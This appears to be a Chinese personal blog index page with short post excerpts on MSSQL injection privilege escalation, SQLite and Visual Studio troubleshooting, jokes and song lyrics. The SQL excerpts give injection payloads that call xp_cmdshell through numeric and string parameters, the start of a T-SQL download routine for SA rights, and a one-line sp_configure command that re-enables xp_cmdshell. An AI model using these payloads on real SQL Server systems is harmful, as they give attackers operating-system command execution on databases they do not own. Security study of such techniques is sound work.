MSSQL注入提权思路:
SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)
相关SQL语句
XP_CMDSHELL:
数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--

查看更多...

Tags: sql 注入

在windows 7 64位系统下使用百度有啊助手登陆时提示：
未能加载文件或程序集 "System.Data.SQLite, Version=1.0.60.0,Culture=neutral,PublicKeyToken=db937bc2d44ff139" 或它的某一个依赖项。试图加载格式不正确的程序。

查看更多...

Tags: 64bit 有啊 system.data.sqlite

注意以下语句在SA权限下执行，对于N多扩展存储过程被删除时使用效果最佳。
DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT

查看更多...

1、执子之手，方知子丑，泪流满面，子不走我走。 ;
2、西游记告诉我们：凡是有后台的妖怪都被接走了，凡是没后台的都被一棒子打死了。 ;
3、你有什么不开心的事？说出来让大家开心一下。 ;
4、我那么喜欢你，你喜欢我一下会死啊。 ;

查看更多...

正当我睁开双眼踏入这个世界
妈妈给我生命现在让我自生自灭
这让我恐惧在我的眼里每个人都戴着面具
回想过去难道生命就是这样延续

查看更多...

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息，请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

SQL2005 在默认的设置中是删除了 XP_CMDSHELL的

遇到这种情况可以用下面一句话解决

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

 

Tags: sql

突然有一天发现我的vs2005的系统注释帮助变成英文的了。

怎么设置都不行,看着英文注释郁闷了好长一段时间。

后来经过同事提醒，才知道原来是装了SQL 2008之后，默认装了.NET 3.5

从一台没装.NET3.5的机子上复制C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\zh-CN路径下的文件覆盖就可以，如图

查看更多...

1.有一个帖子问：说说你最爱的人伤你最深的一句话
　一个哥们回：你进去啦

2.吟得一首好诗不难
   难的是吟一辈子好诗

3.某男问：我长的像不像伍佰
　回帖：只有一半像

4.孔子曰：打架用砖乎，照脸乎，不宜乱乎；乎不着再乎，乎着往死里乎；乎死即拉倒不用再乎也；不死者乃英雄也!
 

5.你觉得什么事情最装B？
　一句话：
　不加标点符号
　死活拆成几行
　还说
　这是诗
　这就是装B
 

查看更多...